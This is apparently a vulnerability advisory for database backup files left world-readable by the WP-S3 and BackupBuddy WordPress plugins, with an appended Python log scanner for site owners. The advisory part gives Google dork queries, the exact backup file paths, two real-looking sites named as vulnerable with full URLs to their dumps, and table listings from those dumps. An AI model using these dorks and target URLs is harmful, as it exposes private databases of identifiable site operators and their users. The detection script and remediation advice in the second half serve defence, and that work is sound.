#################################################################################################
# Exploit Title : WordPress Ithemes-BackupBuddy Amazon WP-S3 Plugins 2.9 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 17/12/2018
# Vendor Homepage : ithemes.com/purchase/backupbuddy/ ~ wordpress.org/plugins/wp-s3/
# Software Download Link : downloads.wordpress.org/plugin/wp-s3.1.5.zip
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : WP-S3 1.5 Version - Ithemes-BackupBuddy 2.9 Version
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/uploads/wp-s3-database-backup.sql''
# + intext:''Powered by Shopify''
# + intext:''© 2018, Holy Sparks Jewish Art & Books For Spiritual & Personal Development Powered by Shopify''
# + intext:''2015 © ALL RIGHTS RESERVED BY THE-SCHMIDT''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
# CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
# CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
WordPress Amazon S3 Plugin 1.5 and WordPress Ithemes-BackupBuddy 2.9
#################################################################################################
# Admin Panel Login Path : /wp-login.php
# Exploit :
/wp-content/uploads/wp-s3-database-backup.sql
/wp-content/uploads/wp-s3-backups.zip
#################################################################################################
# Example SQL Dump : Some Information and Table Names => holysparks.org
-- MySQL dump 10.13 Distrib 5.1.58, for unknown-linux-gnu (x86_64)
--
-- Host: localhost Database: raeshaga_wrd1
-- ------------------------------------------------------
-- Server version 5.1.58-community-log
-- Table structure for table `wp_StreamPad_Tracks`
-- Dumping data for table `wp_StreamPad_Tracks`
-- Table structure for table `wp_affiliates_banners_tbl`
-- Dumping data for table `wp_affiliates_banners_tbl`
-- Table structure for table `wp_affiliates_clickthroughs_tbl`
-- Dumping data for table `wp_affiliates_clickthroughs_tbl`
-- Table structure for table `wp_affiliates_leads_tbl`
-- Dumping data for table `wp_affiliates_leads_tbl`
-- Table structure for table `wp_affiliates_payouts_tbl`
-- Dumping data for table `wp_affiliates_payouts_tbl`
-- Table structure for table `wp_affiliates_sales_tbl`
-- Dumping data for table `wp_affiliates_sales_tbl`
-- Table structure for table `wp_affiliates_tbl`
-- Dumping data for table `wp_affiliates_tbl`
-- Table structure for table `wp_commentmeta`
-- Dumping data for table `wp_commentmeta`
-- Table structure for table `wp_comments`
-- Dumping data for table `wp_comments`
-- Table structure for table `wp_contact_form_7`
-- Dumping data for table `wp_contact_form_7`
-- Table structure for table `wp_ft_wpecards`
-- Dumping data for table `wp_ft_wpecards`
-- Table structure for table `wp_links`
-- Dumping data for table `wp_links`
-- Table structure for table `wp_options`
-- Dumping data for table `wp_options`
-- Dump completed....
################################################################################################
# Example SQL Dump : Information and Table Names => the-schmidt.com
-- MySQL dump 10.13 Distrib 5.1.60, for unknown-linux-gnu (x86_64)
--
-- Host: localhost Database: theschm1_blog
-- ------------------------------------------------------
-- Server version 5.1.60-community-log
-- Table structure for table `wp_PluginManager`
-- Dumping data for table `wp_PluginManager`
-- Table structure for table `wp_custom_fonts`
-- Dumping data for table `wp_custom_fonts`
-- Table structure for table `wp_cvg_gallery`
-- Dumping data for table `wp_cvg_gallery`
-- Table structure for table `wp_cvg_videos`
-- Dumping data for table `wp_cvg_videos`
-- Table structure for table `wp_download_status`
-- Dumping data for table `wp_download_status`
-- Table structure for table `wp_fancybox`
-- Dumping data for table `wp_fancybox`
-- Table structure for table `wp_item_category_associations`
-- Dumping data for table `wp_item_category_associations`
-- Table structure for table `wp_links`
-- Dumping data for table `wp_links`
-- Table structure for table `wp_ngg_album`
-- Dumping data for table `wp_ngg_album`
-- Table structure for table `wp_ngg_gallery`
-- Dumping data for table `wp_ngg_gallery`
-- Table structure for table `wp_ngg_pictures`
-- Dumping data for table `wp_ngg_pictures`
-- Table structure for table `wp_also_bought_product`
-- Dumping data for table `wp_also_bought_product`
-- Table structure for table `wp_blc_filters`
-- Dumping data for table `wp_blc_filters`
-- Table structure for table `wp_blc_instances`
-- Dumping data for table `wp_blc_instances`
-- Table structure for table `wp_blc_links`
-- Dumping data for table `wp_blc_links`
-- Table structure for table `wp_options`
-- Dumping data for table `wp_options`
-- Dump completed...
#################################################################################################
# Example Vulnerable Sites =>
[+] holysparks.org/wp-content/uploads/wp-s3-database-backup.sql
[+] the-schmidt.com/blog/wp-content/uploads/wp-s3-database-backup.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
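The advisory names two backup artifacts that the plugins leave world-readable under /wp-content/uploads/ and shows what a disclosed dump contains. The following Python script is an added example, not part of the original advisory, written from the site owner's side: it scans web-server access logs in the common combined format for requests to those paths and reports whether the server actually delivered the file (HTTP 200/206 with a body) or refused it. It generalises slightly beyond the advisory to any .sql, .sql.gz, .zip or .tar.gz file requested under uploads, and it decodes percent-encoding and collapses ".." segments before matching so that a traversal-style request (the CWE-23 aspect listed above) still hits. The log lines embedded below are constructed for illustration; the addresses are documentation ranges.

```python
"""Detect requests for WP-S3 / BackupBuddy backup artifacts in access logs.

Added example (not part of the original advisory). The sample log lines are
constructed; only the two file names come from the advisory itself.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List
from urllib.parse import unquote, urlsplit

# Combined log format: ip ident user [time] "METHOD path PROTO" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# File names from the advisory, plus the generic backup extensions that this
# class of plugin writes into the uploads directory (a generalisation).
KNOWN_BACKUP_FILES = {"wp-s3-database-backup.sql", "wp-s3-backups.zip"}
BACKUP_EXTENSIONS = (".sql", ".sql.gz", ".zip", ".tar.gz")


@dataclass
class Hit:
    ip: str
    time: str
    path: str      # path exactly as requested
    status: int
    size: int
    served: bool   # True when a body was actually delivered


def normalize_path(raw: str) -> str:
    """Strip the query string, decode percent-encoding and collapse '.'/'..'
    so a disguised request resolves to the path the server would serve."""
    path = unquote(urlsplit(raw).path)
    parts: List[str] = []
    for seg in path.split("/"):
        if seg == "..":
            if parts:
                parts.pop()
        elif seg and seg != ".":
            parts.append(seg)
    return "/" + "/".join(parts)


def is_backup_request(path: str) -> bool:
    """True if the request targets a backup-like file inside wp-content/uploads."""
    norm = normalize_path(path).lower()
    if "/wp-content/uploads/" not in norm:
        return False
    name = norm.rsplit("/", 1)[-1]
    return name in KNOWN_BACKUP_FILES or name.endswith(BACKUP_EXTENSIONS)


def scan_log(lines: Iterable[str]) -> List[Hit]:
    """Return one Hit per request for a backup artifact, in log order."""
    hits: List[Hit] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not is_backup_request(m["path"]):
            continue
        status = int(m["status"])
        size = 0 if m["size"] == "-" else int(m["size"])
        served = status in (200, 206) and size > 0
        hits.append(Hit(m["ip"], m["time"], m["path"], status, size, served))
    return hits


# Constructed sample: one served dump, one blocked archive, one unrelated
# image, and one traversal-style request that resolves back into uploads.
SAMPLE_LOG = [
    '203.0.113.10 - - [17/Dec/2018:10:01:02 +0000] "GET /wp-content/uploads/wp-s3-database-backup.sql HTTP/1.1" 200 4182273 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [17/Dec/2018:10:01:09 +0000] "GET /blog/wp-content/uploads/wp-s3-backups.zip HTTP/1.1" 403 199 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [17/Dec/2018:10:02:00 +0000] "GET /wp-content/uploads/2018/12/photo.jpg HTTP/1.1" 200 51230 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [17/Dec/2018:10:02:30 +0000] "GET /wp-content/uploads/%2e%2e/uploads/site-backup.sql.gz HTTP/1.1" 200 998 "-" "curl/7.58"',
]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        verdict = "SERVED" if hit.served else "blocked"
        print(f"{hit.time} {hit.ip} {hit.status} {verdict} {hit.path}")
```

Run it against the real log with scan_log(open("/var/log/nginx/access.log")). Any hit with served set to True means the dump, including the wp_options table shown in the advisory, has already left the server and its contents should be treated as disclosed; the fix is to keep backups outside the web root, or to have the web server deny direct requests for these extensions under uploads, and then confirm from the same log that later requests return 403 or 404.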